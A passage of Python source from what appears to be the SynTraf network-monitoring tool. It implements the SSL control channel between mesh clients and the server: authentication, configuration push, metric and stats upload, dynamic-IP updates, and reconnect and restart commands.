else:\n client_log.info(f\"AUTHENTICATION SUCCESSFULL\")\n return True\n\n except Exception as exc:\n raise exc\n\n\ndef client_receive_configuration(_config, ssl_conn, threads_n_processes, config_file_path, cli_parameters):\n try:\n # If successful, receiving configuration!\n client_log.debug(f\"WAITING FOR CONFIGURATION\")\n received_data = sock_rcv(ssl_conn)\n\n # Todo, no received data\n if not received_data is None:\n # If no config for this client\n if received_data['PAYLOAD'] is None:\n client_log.warning(f\"THE SERVER DOES NOT HAVE CONFIG FOR THIS NODE FOR NOW\")\n else:\n client_log.info(f\"NEW CONFIG RECEIVED FROM SERVER\")\n\n # PROJ-A\n # If there is no changes, don't restart!\n read_success, disk_config = read_conf(config_file_path)\n if read_success:\n update_config(received_data, disk_config)\n valid_dir_rsa_keypair(disk_config)\n #valid_dir_logs(disk_config)\n 
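# keep the log dir from the CLI parameters rather than the server-pushed config\n 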
disk_config['GLOBAL']['LOGDIR'] = cli_parameters.log_dir\n\n #client_log.debug(_config)\n #client_log.debug(disk_config)\n\n if disk_config == _config:\n client_log.debug(\"SAME SAME SAME SAME\")\n else:\n client_log.debug(\"DIFF DIFF DIFF DIFF\")\n\n # got new config, close all listeners and connectors because if the server has restarted, all the credentials have been re-initialized\n client_log.debug(f\"CLOSING LISTENERS AND CONNECTORS BEFORE APPLYING NEW CONFIG\")\n from lib.st_process_and_thread import close_listeners_and_connectors\n close_listeners_and_connectors(threads_n_processes, _config)\n\n # update local config\n client_log.debug(f\"UPDATING LOCAL CONFIG WITH CONFIG SENT BY SERVER\")\n update_config(received_data, _config)\n\n # Saving RSA keypair for iperf3 authentication\n client_log.debug(f\"SAVING IPERF3 RSA KEYPAIR\")\n save_credentials(received_data, _config)\n\n client_log.info(\n f\"CONFIG WILL LOAD IN LESS THAN {_config['GLOBAL']['WATCHDOG_CHECK_RATE']} seconds (see : WATCHDOG_CHECK_RATE)\")\n else:\n client_log.info(f\"RECEIVED DATA IS NONE\")\n except Exception as exc:\n raise exc\n\n\ndef client_send_system_infos(ssl_conn):\n try:\n client_log.debug(f\"SENDING SYSTEM INFOS TO SERVER\")\n system_infos = get_system_infos()\n sock_send(ssl_conn, system_infos, \"SYSTEM_INFOS\")\n except Exception as exc:\n raise exc\n\n\ndef client_send_metrics(_config, ssl_conn, dict_data_to_send_to_server):\n try:\n # If we have some metrics to save, send them to the server\n # We send a dictionary to the server in which the key is a hash of the payload, and the value holds the metrics\n # Once we receive an ack, the payload will contain a list of all the hashes that were correctly written to disk.\n # Then we delete those key/value pairs in our local dictionary and print a count of how much of the data sent was written.\n\n client_log.debug(f\"AMOUNT OF METRICS TO SEND TO SERVER: {len(dict_data_to_send_to_server)}\")\n if len(dict_data_to_send_to_server) >= 1:\n # we need to extract hashes and values as two different lists.\n # the server will write in bulk, so once it confirms everything is written, we can use the list of hashes to remove those elements from \"dict_data_to_send_to_server\"\n # We extract the dictionary at the same time so that there is no insertion of metrics in between\n dict_data_to_send_to_server_as_array = list(dict_data_to_send_to_server.items())\n keys_of_metrics_to_send_to_server = [x[0] for x in dict_data_to_send_to_server_as_array]\n values_of_metrics_to_send_to_server = [x[1] for x in dict_data_to_send_to_server_as_array]\n\n sock_send(ssl_conn, values_of_metrics_to_send_to_server, \"SAVE_METRIC\")\n client_log.debug(\n f\"METRICS DICTIONARY SENT WITH {len(values_of_metrics_to_send_to_server)} METRIC(S), WAITING FOR CONFIRMATION\")\n received_data = sock_rcv(ssl_conn)\n client_log.debug(\n f\"JUST RECEIVED THE FOLLOWING ANSWER FROM THE SERVER : {received_data['COMMAND']}:{received_data['PAYLOAD']}\")\n if received_data:\n if received_data['PAYLOAD'] == \"OK\":\n client_log.debug((\n f\"SERVER CONFIRMED THAT {len(values_of_metrics_to_send_to_server)} METRIC(S) HAVE BEEN WRITTEN TO DATABASE\"))\n # removing metrics from local queue as the server has acknowledged having written them to disk\n for id in keys_of_metrics_to_send_to_server:\n # if the dict has reached the max length defined (DEFAULT_WRITE_QUEUE_BUFFER_DEPTH), it is possible the id is no longer there.\n if id in dict_data_to_send_to_server:\n dict_data_to_send_to_server.pop(id)\n\n elif 
received_data['PAYLOAD'] == \"NOK\":\n client_log.error(f\"SERVER WAS UNABLE TO WRITE METRICS TO DATABASE\")\n else:\n client_log.error(\n f\"CONNECTION TO {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']} LOST\")\n return False\n return True\n except Exception as exc:\n raise exc\n\n\ndef client_send_heartbeat(ssl_conn):\n try:\n sock_send(ssl_conn, \"\", \"HEARTBEAT\")\n except Exception as exc:\n raise exc\n\n\ndef client_send_system_stats(ssl_conn, obj_stats):\n # We send the system stats to the server\n # Custom classes are not serializable, so dumping obj_stats properties into a dict\n try:\n if obj_stats.hasdata:\n sock_send(ssl_conn, obj_stats.as_dict(), \"SAVE_STATS_METRIC\")\n obj_stats.hasdata = False\n #client_log.debug(f\"SYSTEM STATS SENT TO SERVER\")\n #else:\n #client_log.debug(f\"NO SYSTEM STATS TO SEND TO SERVER\")\n except Exception as exc:\n raise exc\n\n\ndef client_awaiting_command(ssl_conn):\n try:\n # We give the server a chance to send us an action\n #client_log.debug(f\"BEFORE ASKING FOR COMMAND TO THE SERVER\")\n sock_send(ssl_conn, \"\", \"AWAITING_COMMAND\")\n #client_log.debug(f\"AFTER ASKING FOR COMMAND TO THE SERVER\")\n\n # Receiving the answer\n #client_log.debug(f\"BEFORE RECEIVING COMMAND OR NOP FROM THE SERVER\")\n received_data = sock_rcv(ssl_conn)\n #client_log.debug(f\"AFTER RECEIVING COMMAND OR NOP FROM THE SERVER\")\n except Exception as exc:\n raise exc\n\n return received_data\n\n\ndef client_command_reconnect(ssl_conn):\n \"\"\"\n This function is called when a client receives the COMMAND \"RECONNECT_CLIENT\".\n It closes the current socket, then exits the client thread.\n At the next watchdog loop, the client thread will be respawned and the client will reconnect.\n :param ssl_conn: The current ssl socket\n \"\"\"\n try:\n client_log.info(\"RECEIVED A REQUEST FROM THE SERVER TO DISCONNECT\")\n ssl_conn.shutdown(socket.SHUT_RDWR)\n ssl_conn.close()\n client_log.info(\"DISCONNECTED\")\n sys.exit()\n except Exception as exc:\n raise exc\n\n\ndef client_command_restart(ssl_conn):\n \"\"\"\n This function is called when a client receives the COMMAND \"RESTART_CLIENT\".\n It removes the pid lock file, closes the current socket and restarts the syntraf master process.\n It restarts differently depending on whether it's running inside a bundle.\n :param ssl_conn: The current ssl socket\n \"\"\"\n try:\n client_log.info(\"RECEIVED A REQUEST FROM THE SERVER TO RESTART\")\n\n # shutting down socket\n ssl_conn.shutdown(socket.SHUT_RDWR)\n ssl_conn.close()\n\n # remove pid file\n pid_file_path = DefaultValues.SYNTRAF_PID_FILE\n pid_file = pathlib.Path(pid_file_path)\n pid_file.unlink()\n\n # if we are inside a pyinstaller bundle\n if getattr(sys, 'frozen', False):\n os.execv(sys.executable, sys.argv)\n # Windows only for now\n else:\n os.execl(sys.executable, 'python', *sys.argv)\n except Exception as exc:\n raise exc\n\n\ndef client_send_thread_status(ssl_conn, threads_n_processes):\n # We send the threads status to the server\n # Custom classes are not serializable, so dumping st_obj_process_n_thread properties into a dict\n try:\n thread_status = {}\n for thr in threads_n_processes:\n if not thr.syntraf_instance_type == \"READ_LOG\":\n thread_status[thr.name + thr.syntraf_instance_type] = thr.asjson()\n\n sock_send(ssl_conn, thread_status, \"SAVE_THREAD_STATUS\")\n #client_log.debug(f\"THREAD STATUS SENT TO SERVER\")\n except Exception as exc:\n raise exc\n\n\ndef client_command_diffconfig(_config, received_data, threads_n_processes):\n try:\n 
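# a DIFFCONFIG patches a single configuration element in place instead of resending the whole config\n 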
client_log.info(\"RECEIVED A REQUEST TO UPDATE LOCAL CONFIG WITH A DIFFCONFIG\")\n\n # A dynamic client just connected, we need to add his IP address to the local config\n if received_data['PAYLOAD']['ELEMENT'] == \"CLIENT_IP\":\n # In case there was no CONNECTORS associated with that client, there is no IP to update.\n if 'CONNECTORS' in _config:\n for connector_key, connector in _config['CONNECTORS'].items():\n # If a CONNECTOR config match the client_uid, change the destination_address for the one we just received.\n # If we receive a valid IP we do not need to restart the connector, the next loop will launch the process for the first time\n # But if we are setting it to the default IP for dynamic client \"0.0.0.0\", process_and_thread will not start a CONNECTOR when there is that IP assigned. We will take care to terminate the actual CONNECTOR.\n if re.match(\n r\"^.{40}_MEMBER_OF_GROUP_.+_CONNECTING_TO_\" + received_data['PAYLOAD']['CLIENT_UID'] + \"$\",\n connector_key):\n _config['CONNECTORS'][connector_key]['DESTINATION_ADDRESS'] = received_data['PAYLOAD']['IP_ADDRESS']\n client_log.info(\n f\"CONNECTOR: '{connector_key}' DESTINATION IP ADDRESS UPDATED WITH '{received_data['PAYLOAD']['IP_ADDRESS']}'\")\n\n # If we are reverting to unknown dynamic IP client, we should terminate the associated CONNECTOR\n if received_data['PAYLOAD']['IP_ADDRESS'] == \"0.0.0.0\":\n for thr in threads_n_processes:\n if thr.syntraf_instance_type == \"CONNECTOR\" and connector_key in thr.name:\n client_log.info(f\"CONNECTOR: '{connector_key}' TERMINATED BECAUSE IP ADDRESS IS NOW UNKNOWN (CLIENT IS NOT CONNECTED TO SERVER ANYMORE)'\")\n thr.close()\n from lib.st_process_and_thread import terminate_connector_and_childs\n terminate_connector_and_childs(threads_n_processes, connector_key, thr, _config)\n except Exception as exc:\n raise exc\n\n\n#################################################################################\n### MESH CLIENT SOCKET\n#################################################################################\ndef client(_config, stop_thread, dict_data_to_send_to_server, threads_n_processes, obj_stats, config_file_path, cli_parameters):\n\n address = \"0.0.0.0\"\n ssl_conn = None\n try:\n ssl_conn = client_sck_init(_config)\n client_utime = client_connect_utime(_config)\n successful_auth = client_send_auth(_config, client_utime, ssl_conn)\n\n if not successful_auth:\n ssl_conn.close()\n return\n\n client_receive_configuration(_config, ssl_conn, threads_n_processes, config_file_path, cli_parameters)\n client_send_system_infos(ssl_conn)\n\n current_obj_process_n_thread = None\n while not current_obj_process_n_thread:\n if stop_thread[0]: break\n current_obj_process_n_thread = lib.st_process_and_thread.get_obj_process_n_thread(threads_n_processes, \"CLIENT\")\n time.sleep(1)\n\n while True:\n # Update last activity\n current_obj_process_n_thread.last_activity = datetime.now()\n\n if stop_thread[0]: break\n\n client_send_heartbeat(ssl_conn)\n\n client_send_thread_status(ssl_conn, threads_n_processes)\n\n if not client_send_metrics(_config, ssl_conn, dict_data_to_send_to_server): break\n\n client_send_system_stats(ssl_conn, obj_stats)\n\n received_data = client_awaiting_command(ssl_conn)\n\n if not received_data is None:\n if received_data['COMMAND'] == \"RECONNECT_CLIENT\":\n client_command_reconnect(ssl_conn)\n\n if received_data['COMMAND'] == \"RESTART_CLIENT\":\n client_command_restart(ssl_conn)\n\n # We just received a specific part of the configuration that we should change locally.\n 
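# (e.g. the new IP address of a dynamic client, applied in client_command_diffconfig)\n 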
elif received_data['COMMAND'] == \"DIFFCONFIG\":\n client_command_diffconfig(_config, received_data, threads_n_processes)\n\n #client_log.debug(f\"SLEEPING FOR {DefaultValues.CONTROL_CHANNEL_HEARTBEAT} SECOND(S)\")\n time.sleep(DefaultValues.CONTROL_CHANNEL_HEARTBEAT)\n # client_log.debug(f\"SLEEP IS OVER\")\n\n else:\n client_log.info(f\"RECEIVED DATA IS NONE\")\n\n except socket.timeout as exc:\n client_log.error(f\"SOCKET TIMEOUT: {address}: CLOSING CONNECTION\")\n except OSError as exc:\n if exc.errno == 32: # BROKEN PIPE, THE OTHER END HAS GONE AWAY\n client_log.error(f\"BROKEN PIPE: {address}: CLOSING CONNECTION\")\n # CONNECTION RESET BY PEER\n elif exc.errno == 104:\n client_log.error(f\"CONNECTION RESET BY PEER: {address}: CLOSING CONNECTION\")\n elif exc.errno == 113:\n client_log.error(f\"NO ROUTE TO HOST: {address}: CLOSING CONNECTION\")\n # CONNECTION TIMEOUT\n elif exc.errno == 110:\n client_log.error(f\"CONNECTION TIMEOUT: {address}: CLOSING CONNECTION\")\n # FOR WINDOWS [WinError 10053] #An established connection was aborted by the software in your host machine\n elif exc.errno == 10053:\n client_log.error(f\"CONNECTION ABORTED: {address}: CLOSING CONNECTION\")\n # FOR WINDOWS [WinError 10054]\n elif exc.errno == 10054:\n client_log.error(f\"CONNECTION RESET BY PEER: {address}: CLOSING CONNECTION\")\n elif exc.errno == 10057: # FOR WINDOWS [WinError 10057]\n client_log.error(f\"{type(exc).__name__.upper()}:{exc.errno}: {address}: CLOSING CONNECTION\")\n elif exc.errno == 8:\n client_log.error(f\"INVALID SSL CONNECTION. SERVER PROBABLY TERMINATED THE CONNECTION.\")\n else:\n client_log.error(f\"UNHANDLED OSError (st_mesh:sock_rcv): {address}: {exc} (errno={exc.errno}: {exc.strerror})\")\n except json.JSONDecodeError as exc:\n client_log.error(f\"JSON DECODING FAILED FOR STRING\")\n except ConnectionResetError as exc:\n client_log.error(f\"CONNECTION TO {_config['CLIENT']['SERVER']}:{_config['CLIENT']['SERVER_PORT']} LOST\")\n except Exception as exc:\n client_log.error(f\"client:{type(exc).__name__}:{exc}\", exc_info=True)\n finally:\n try:\n ssl_conn.close()\n except Exception as e:\n pass\n\n\ndef validate_clock_skew(_config, received_data, obj_client):\n \"\"\"\n This function compares the time between the server and the client.\n The objective is to show a warning to the user.\n Unsynchronized clients will lead to graphs not being aligned and make comparison difficult.\n Plus, iperf3 with RSA does not like clock skew. There is a workaround by setting IPERF3_TIME_SKEW_THRESHOLD,\n but it's preferable to just sync the clock.\n :param _config: The TOML config file (nested dict)\n :param received_data: The payload we just received from the client, containing the client timestamp\n :param obj_client: The object representing the current client\n \"\"\"\n dt = datetime.now()\n timezone = pytz.timezone(DefaultValues.TIMEZONE)\n dt_tz = timezone.localize(dt)\n server_utime = dt_tz.astimezone(pytz.timezone(\"UTC\")).timestamp()\n client_utime = received_data['PAYLOAD']['TIMESTAMP']\n clock_skew = server_utime - client_utime\n obj_client.clock_skew_in_seconds = clock_skew\n if abs(clock_skew) > int(_config['GLOBAL']['IPERF3_TIME_SKEW_THRESHOLD']):\n server_log.warning(\n f\"CONTEXT: {obj_client.client_uid} - CLOCK SKEW BETWEEN CLIENT AND SERVER IS TOO GREAT '{clock_skew} SECONDS'. WARNING : IF THE SAME SKEW HAPPENS BETWEEN NODES, THE IPERF3 CONTROL CHANNEL WILL FAIL. 
IF YOU CANNOT TIME SYNC THE NODES, YOU CAN ADJUST THE CLOCK OF THE NODES OR CHANGE THE VAR 'SERVER_IPERF3_TIME_SKEW_THRESHOLD'\")\n\n\ndef authenticate_server_client(_config, data, obj_client, sckt):\n valid_token = False\n valid_server_client = False\n ip_addr = sckt.getpeername()[0]\n rejection_explanation = \"\"\n\n for description, token in _config['SERVER']['TOKEN'].items():\n if data['PAYLOAD']['TOKEN'] == token:\n valid_token = True\n\n if is_valid_server_client(_config, data['PAYLOAD']['CLIENT_UID'], sckt):\n valid_server_client = True\n\n if valid_token and valid_server_client:\n server_log.info(\n f\"AUTHENTICATION SUCCESSFUL FROM IP '{ip_addr}' WITH CLIENT_UID '{data['PAYLOAD']['CLIENT_UID']}'\")\n\n # NEW STATUS TRACKING\n obj_client.status = \"CONNECTED\"\n obj_client.status_since = datetime.now()\n\n return True, \"\"\n\n elif valid_token and not valid_server_client:\n # Temporary, testing dynamic IP\n server_log.error(\n f\"AUTHENTICATION FAILED FROM IP '{ip_addr}' WITH CLIENT UID '{obj_client.client_uid}. CLIENT UID INVALID.\")\n rejection_explanation = \"UNKNOWN CLIENT\"\n\n elif not valid_token and valid_server_client:\n server_log.error(\n f\"AUTHENTICATION FAILED FROM IP '{ip_addr}' WITH CLIENT UID '{obj_client.client_uid}. TOKEN INVALID.\")\n rejection_explanation = \"INVALID TOKEN\"\n\n elif not valid_token and not valid_server_client:\n server_log.error(\n f\"AUTHENTICATION FAILED FROM IP '{ip_addr}' WITH CLIENT UID '{obj_client.client_uid}. CLIENT UID AND TOKEN INVALID.\")\n rejection_explanation = \"UNKNOWN CLIENT AND INVALID TOKEN\"\n\n return False, rejection_explanation\n\n\ndef send_config(dict_by_node_generated_config, client_uid, sckt, _config):\n bool_we_have_config_for_this_client = False\n try:\n # Now we can send the configuration of this mesh client\n # First, do we have something to send?\n # Then, IF THE IP ADDRESS AND THE UID ARE EQUAL, WE CAN SEND THIS CONFIGURATION!\n if dict_by_node_generated_config:\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == client_uid:\n if server_client['UID'] in dict_by_node_generated_config:\n dict_by_node_generated_config[server_client['UID']]['CLIENT'] = {\n \"RSA_KEY_LISTENERS\": _config['SERVER']['RSA_KEY_LISTENERS'].decode(),\n \"RSA_KEY_CONNECTORS\": _config['SERVER']['RSA_KEY_CONNECTORS'].decode(),\n \"IPERF3_USERNAME\": _config['SERVER']['IPERF3_USERNAME'],\n \"IPERF3_PASSWORD\": _config['SERVER']['IPERF3_PASSWORD'],\n \"IPERF3_PASSWORD_HASH\": _config['SERVER']['IPERF3_PASSWORD_HASH']}\n dict_by_node_generated_config[server_client['UID']]['GLOBAL'] = {\n \"IPERF3_TIME_SKEW_THRESHOLD\": _config['GLOBAL']['IPERF3_TIME_SKEW_THRESHOLD']}\n sock_send(sckt, dict_by_node_generated_config[server_client['UID']], \"NEWCONFIG\")\n bool_we_have_config_for_this_client = True\n except Exception as exc:\n server_log.error(f\"Handler:handle:{type(exc).__name__}:{exc}\", exc_info=True)\n\n return bool_we_have_config_for_this_client\n\n\ndef server_save_metric(obj_client, conn_db, received_data, address, sckt):\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - RECEIVED A COMMAND TO SAVE METRICS\")\n try:\n results_of_write_operation_on_multiple_db = []\n for conn in conn_db:\n # TODO, print what is the database we are actually writing to and the result\n server_log.debug(\n f\"CONTEXT: {obj_client.client_uid} - SAVING METRICS TO DATABASE '{conn.get_Database_UID()}'\")\n results_of_write_operation_on_multiple_db.append(\n conn.save_metrics_to_database_with_buffer(received_data['PAYLOAD'], 
address, obj_client.client_uid))\n\n result = \"FAIL\"\n if \"OK\" in results_of_write_operation_on_multiple_db and \"ERROR\" not in results_of_write_operation_on_multiple_db:\n result = \"FULL\"\n elif \"OK\" in results_of_write_operation_on_multiple_db and \"ERROR\" in results_of_write_operation_on_multiple_db:\n result = \"PARTIAL\"\n server_log.warning(f\"SERVER WAS NOT ABLE TO SAVE METRICS TO ALL DATABASES'\")\n\n # For now, if data is written to at least one database, allow the client to empty his cache.\n # In the future, we could get more sophisticated and resend the data to specific database\n if result == \"FULL\" or result == \"PARTIAL\":\n server_log.debug(\n f\"CONTEXT: {obj_client.client_uid} - {len(received_data['PAYLOAD'])} METRICS FOR CLIENT {obj_client.client_uid} WRITTEN TO DATABASE\")\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - SENDING ACK TO CLIENT\")\n sock_send(sckt, \"OK\", \"ACK\")\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - ACK SENT TO CLIENT\")\n else:\n server_log.error(\n f\"CONTEXT: {obj_client.client_uid} - UNABLE TO WRITE {len(received_data['PAYLOAD'])} METRICS FOR CLIENT {obj_client.client_uid}\")\n sock_send(sckt, \"NOK\", \"ACK\")\n except Exception as exc:\n server_log.error(\n f\"CONTEXT: {obj_client.client_uid} - UNABLE TO WRITE {len(received_data['PAYLOAD'])} METRICS FOR CLIENT {obj_client.client_uid}\")\n sock_send(sckt, \"NOK\", \"ACK\")\n\n\ndef server_auth(received_data, obj_client, _config, address, dict_of_commands_for_network_clients, sckt,\n _dict_by_node_generated_config, dict_of_client_pending_acceptance, threads_n_processes):\n obj_client.client_uid = received_data['PAYLOAD']['CLIENT_UID']\n public_key = received_data['PAYLOAD']['PUBLIC_KEY']\n\n server_log.debug(\n f\"CONTEXT: {obj_client.client_uid} - NEW CONNECTION FROM CLIENT_UID : '{obj_client.client_uid}', SOURCE_IP : '{address}'\")\n\n auth_ok = False\n # CHECK IF PUBLIC KEY IS IN THE CONFIG FILE FOR THIS SPECIFIC CLIENT\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == obj_client.client_uid:\n if 'PUBLIC_KEY' in server_client:\n print(\"NEW AUTH SUCCESSFUL **************************************\")\n auth_ok = True\n pass\n\n if not auth_ok:\n # add this public key and other interesting informations to a dictionnary that will be use to keep pending acceptation\n dict_of_client_pending_acceptance[obj_client.client_uid] = public_key\n\n # Authentication, if token is wrong, disconnect\n is_authenticated, rejection_explanation = authenticate_server_client(_config, received_data, obj_client, sckt)\n\n if is_authenticated:\n obj_client.status = \"CONNECTED\"\n obj_client.status_explanation = \"AUTHENTICATION SUCCESSFUL\"\n obj_client.status_since = datetime.now()\n\n sock_send(sckt, None, obj_client.status_explanation)\n\n else:\n obj_client.status = rejection_explanation\n obj_client.status_explanation = \"AUTHENTICATION FAILED\"\n obj_client.status_since = datetime.now()\n\n sock_send(sckt, rejection_explanation, \"AUTH_FAILED\")\n\n return False\n\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == obj_client.client_uid:\n\n # If this is a dynamic IP client\n if server_client['IP_ADDRESS'] == \"0.0.0.0\":\n\n server_log.debug(\n f\"CONTEXT: {obj_client.client_uid} - THIS CLIENT HAS DYNAMIC IP, UPDATING LOCAL CONFIG AND PUSHING TO OTHER CLIENTS\")\n\n # So that we can track that this is a dynamic client and rollback the ip when disconnection occur.\n obj_client.bool_dynamic_client = True\n\n # Updating the 
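# The FULL / PARTIAL / FAIL decision in server_save_metric() is a pure
# function of the per-database results, so it can be factored out and tested
# alone. Sketch assuming each backend reports the strings "OK" or "ERROR":
def aggregate_write_results(results):
    ok, error = "OK" in results, "ERROR" in results
    if ok and not error:
        return "FULL"
    if ok and error:
        return "PARTIAL"
    return "FAIL"

# aggregate_write_results(["OK", "ERROR"]) -> "PARTIAL"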
client object with the ip address he's coming from\n server_client['IP_ADDRESS'] = obj_client.ip_address\n\n # We need to regenerate the config, we pass the _dict_by_node_generated_config variable to avoid the webui and process_and_thread to continue to use the old memory pointer\n _dict_by_node_generated_config, _dict_by_group_of_generated_tuple_for_map = generate_client_config_mesh(\n _config, _dict_by_node_generated_config)\n\n # Telling to every other client to update their config\n for server_client2 in _config['SERVER_CLIENT']:\n\n # If there is an existing OVERRIDE_DST_NODE_IP, do not update the config\n skip_flag = False\n if 'OVERRIDE_DST_NODE_IP' in server_client2:\n if server_client2['OVERRIDE_DST_NODE_IP']:\n for override_ip_client_uid in server_client2['OVERRIDE_DST_NODE_IP']:\n if override_ip_client_uid == obj_client.client_uid:\n skip_flag = True\n\n if not skip_flag:\n # Do not update the client itself\n if not server_client2['UID'] == obj_client.client_uid:\n dict_of_commands_for_network_clients[server_client2['UID']] = []\n dict_of_commands_for_network_clients[server_client2['UID']].append(\n {\"ACTION\": \"UPDATED_CONFIG\", \"ELEMENT\": \"CLIENT_IP\",\n \"CLIENT_UID\": obj_client.client_uid, \"IP_ADDRESS\": obj_client.ip_address})\n\n # Show an alert in the log when the clock skew is too great\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - STARTING VALIDATION OF CLOCK SKEW\")\n validate_clock_skew(_config, received_data, obj_client)\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - VALIDATION OF CLOCK SKEW COMPLETED\")\n\n # Send the config to the client\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - SENDING CONFIG TO THE CLIENT\")\n bool_we_have_config_for_this_client = send_config(_dict_by_node_generated_config, obj_client.client_uid, sckt, _config)\n\n obj_client.syntraf_version = received_data['PAYLOAD']['SYNTRAF_CLIENT_VERSION']\n\n # No config for this client!\n if not bool_we_have_config_for_this_client:\n sock_send(sckt, None, \"NEWCONFIG\")\n server_log.info(f\"CONTEXT: {obj_client.client_uid} - NO CONFIG FOR THIS CLIENT'\")\n\n obj_client.status = \"CONNECTED (PASSIVE)\"\n obj_client.status_explanation = \"NO CONFIG FOR THIS CLIENT\"\n obj_client.status_since = datetime.now()\n\n return True\n\n\ndef server_save_stats_metric(obj_client, received_data):\n \"\"\"\n Insert system stats metric we just received from the client into corresponding obj_client.system_stats dictionary\n It will eventually be read by the API for the WEBUI\n It is called everytime the client send stats which should be quite often\n :param obj_client: The object representing the current client\n :param received_data: The payload we just received from the client containing the systems stats metric\n \"\"\"\n # Make sure that the client system stats history does not get too big\n if len(obj_client.system_stats.setdefault('if_pct_usage_rx', [])) >= 100: obj_client.system_stats[\n 'if_pct_usage_rx'].pop(0)\n if len(obj_client.system_stats.setdefault('if_pct_usage_tx', [])) >= 100: obj_client.system_stats[\n 'if_pct_usage_tx'].pop(0)\n if len(obj_client.system_stats.setdefault('mem_pct_free', [])) >= 100: obj_client.system_stats['mem_pct_free'].pop(\n 0)\n if len(obj_client.system_stats.setdefault('cpu_pct_usage', [])) >= 100: obj_client.system_stats[\n 'cpu_pct_usage'].pop(0)\n\n obj_client.system_stats['if_pct_usage_rx'].append(\n (received_data['PAYLOAD']['timestamp'], received_data['PAYLOAD']['if_pct_usage_rx']))\n 
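# The setdefault()/pop(0) bookkeeping that caps each stats series at 100
# samples is what collections.deque provides natively. Same idea, sketched
# under the assumption that the WEBUI only reads the series sequentially:
from collections import deque

MAX_SAMPLES = 100
system_stats = {key: deque(maxlen=MAX_SAMPLES)
                for key in ("if_pct_usage_rx", "if_pct_usage_tx",
                            "mem_pct_free", "cpu_pct_usage")}

def record_sample(stats, key, timestamp, value):
    stats[key].append((timestamp, value))  # oldest sample is dropped automatically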
obj_client.system_stats['if_pct_usage_tx'].append(\n (received_data['PAYLOAD']['timestamp'], received_data['PAYLOAD']['if_pct_usage_tx']))\n obj_client.system_stats['mem_pct_free'].append(\n (received_data['PAYLOAD']['timestamp'], received_data['PAYLOAD']['mem_pct_free']))\n obj_client.system_stats['cpu_pct_usage'].append(\n (received_data['PAYLOAD']['timestamp'], received_data['PAYLOAD']['cpu_pct_usage']))\n\n\ndef server_awaiting_commands(client_uid, dict_of_commands_for_network_clients, sckt):\n \"\"\"\n Read a dictionary of pending command and send them to the client\n :param client_uid: The uid of the client we are serving\n :param dict_of_commands_for_network_clients: A dictionary of all the pending command. It's organized by client_uid and each command are a sub dictionnary that contain mandatorily the key \"ACTION\"\n :param sckt: The current socket connected to the client\n \"\"\"\n # The client is waiting, if there is no explicit action, send a NOP\n sent_an_action = False\n # Do we have action to send to client?\n if client_uid in dict_of_commands_for_network_clients:\n if len(dict_of_commands_for_network_clients[client_uid]) >= 1:\n for action in dict_of_commands_for_network_clients[client_uid]:\n server_log.info(f\"SENDING THE ACTION '{action}' TO THE CLIENT {client_uid}\")\n if action['ACTION'] == \"RECONNECT_CLIENT\":\n server_log.debug(f\"CONTEXT: {client_uid} - SENDING A 'RECONNECT_CLIENT' COMMAND\")\n sock_send(sckt, \"\", \"RECONNECT_CLIENT\")\n server_log.debug(f\"CONTEXT: {client_uid} - 'RECONNECT' COMMAND FOR A CLIENT_IP SENT\")\n sent_an_action = True\n dict_of_commands_for_network_clients[client_uid].remove(action)\n elif action['ACTION'] == \"RESTART_CLIENT\":\n server_log.debug(f\"CONTEXT: {client_uid} - SENDING A 'RESTART_CLIENT' COMMAND\")\n sock_send(sckt, \"\", \"RESTART_CLIENT\")\n server_log.debug(f\"CONTEXT: {client_uid} - 'RESTART_CLIENT' COMMAND FOR A CLIENT_IP SENT\")\n sent_an_action = True\n dict_of_commands_for_network_clients[client_uid].remove(action)\n elif action['ACTION'] == \"UPDATED_CONFIG\":\n if action['ELEMENT'] == \"CLIENT_IP\":\n server_log.debug(f\"CONTEXT: {client_uid} - SENDING AN 'UPDATE_CONFIG' ACTION FOR A CLIENT_IP\")\n sock_send(sckt, action, \"DIFFCONFIG\")\n server_log.debug(f\"CONTEXT: {client_uid} - 'UPDATE_CONFIG' COMMAND FOR A CLIENT_IP SENT\")\n sent_an_action = True\n dict_of_commands_for_network_clients[client_uid].remove(action)\n\n # The client is waiting for a command, if we don't have any, we should send a NOP to unblock it.\n if not sent_an_action:\n server_log.debug(f\"CONTEXT: {client_uid} - SENDING A NOP\")\n sock_send(sckt, \"\", \"NOP\")\n server_log.debug(f\"CONTEXT: {client_uid} - NOP SENT\")\n\n\ndef server_save_system_infos(obj_client, received_data):\n \"\"\"\n Assign the system_infos we just received from the client to the corresponding obj_client. 
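# server_awaiting_commands() drains a per-client action list and falls back
# to a NOP so the blocked client wakes up. The same contract in miniature;
# send() stands in for sock_send() and the per-ACTION dispatch is collapsed:
def drain_commands(pending, client_uid, send):
    sent = False
    for action in list(pending.get(client_uid, [])):  # copy: we mutate below
        send(action)
        pending[client_uid].remove(action)
        sent = True
    if not sent:
        send({"ACTION": "NOP"})  # unblock the waiting client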
It will eventually be read by the API for the WEBUI\n It is called only one time just after the authentication\n :param obj_client: The object representing the current client\n :param received_data: The payload we just received from the client containing the systems informations\n \"\"\"\n server_log.debug(f\"CONTEXT: {obj_client.client_uid} - RECEIVED A COMMAND TO SAVE SYSTEM INFOS\")\n obj_client.system_infos = received_data['PAYLOAD']\n\n\ndef server_forget_dynamic_client_ip(obj_client, _config, dict_of_commands_for_network_clients):\n \"\"\"\n When a client does not have a static IP configured in the config file, it is assigned with a default \"0.0.0.0\" IP.\n When then syntraf client thread spawner see this, it will not launch the iperf3 CONNECTOR thread until he receive\n a COMMAND to update the IP to something else. When the client with dynamic IP disconnect, we replace the IP by\n \"0.0.0.0\" again and inform the other client so that no CONNECTOR are launch for nothing.\n :param obj_client: The object representing the current client\n :param _config: The TOML config file (nested dict)\n :param dict_of_commands_for_network_clients: A dictionary of all the pending command. It's organized by client_uid\n and each command are a sub dictionnary that contain mandatorily the key \"ACTION\"\n \"\"\"\n # Rollback ip_address to the default\n if obj_client.bool_dynamic_client:\n for server_client in _config['SERVER_CLIENT']:\n if server_client['UID'] == obj_client.client_uid:\n 